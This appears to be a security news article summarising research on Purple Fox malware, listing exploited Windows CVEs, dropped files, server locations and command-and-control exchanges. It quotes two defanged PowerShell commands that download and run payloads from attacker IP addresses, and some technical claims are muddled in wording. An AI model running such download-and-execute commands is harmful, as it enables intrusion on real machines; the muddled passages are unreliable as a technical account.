The cybersecurity experts at Trend Micro have found a very suspicious activity of Purple Fox operators. This Purple Fox malware installs further malicious payloads on all the devices that are already infected or compromised.
The threat actors have noticed that the attacks generally take advantage of legitimate software for implementing malicious payloads. The vulnerability has been named CVE-2021-1732, and this vulnerability generally optimizes rootkit capabilities that are leveraged in their attacks.
Capabilities & Technical Analysis
In this attack, the threat actors have implemented some commands such as:-
- “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png”
- “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//117.187.136.141[:]13405/57BC9B7E.Png’);MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png”
However, this kind of command helps the threat actor to download some malicious payloads in the affected devices that have been hosted on several compromised servers.
The PurpleFox servers have been founded on some locations that we have mentioned below:-
- China – 345
- India – 34
- Brazil – 29
- The United States – 26
- Others – 113
Targeted vulnerabilities
The vulnerabilities that are targeted or exploited:-
- CVE-2020-1054 (KB4556836, KB4556843)
- CVE-2019-0808 (KB4489878, KB4489885, KB2882822)
- CVE-2019-1458 (KB4530702, KB4530730)
- CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)
Files dropped
The cybersecurity experts have found some files that have been dropped onto the infected system:
- Calldriver.exe
- Driver.sys
- dll.dll
- kill.bat
- speedmem2.hg
Second & Third Exchange (Victim to C&C)
However, in the second key exchange, it has been noted that the messages are sent from the severe to the infected device of the client, and all of these were handled on the onReceive function.
In the third exchange, once the encrypted session is designated over the WebSocket, now the users have to put their fingerprint on the machine.
And all of this is done by extracting some definite information such as:-
- Machine name
- Local IP
- MCA address
- Windows version
This type of attack is quite hazardous and has a lot of impact on the infected device. After investigating the whole attack, the cybersecurity detected a large number of malicious installers that kept delivering the same Purple Fox rootkit version.
And threat actors do this by using a similar attack chain, and not only that even they also deliver emails through email; on the other side, there are some that have been suspected to be downloaded from phishing websites.
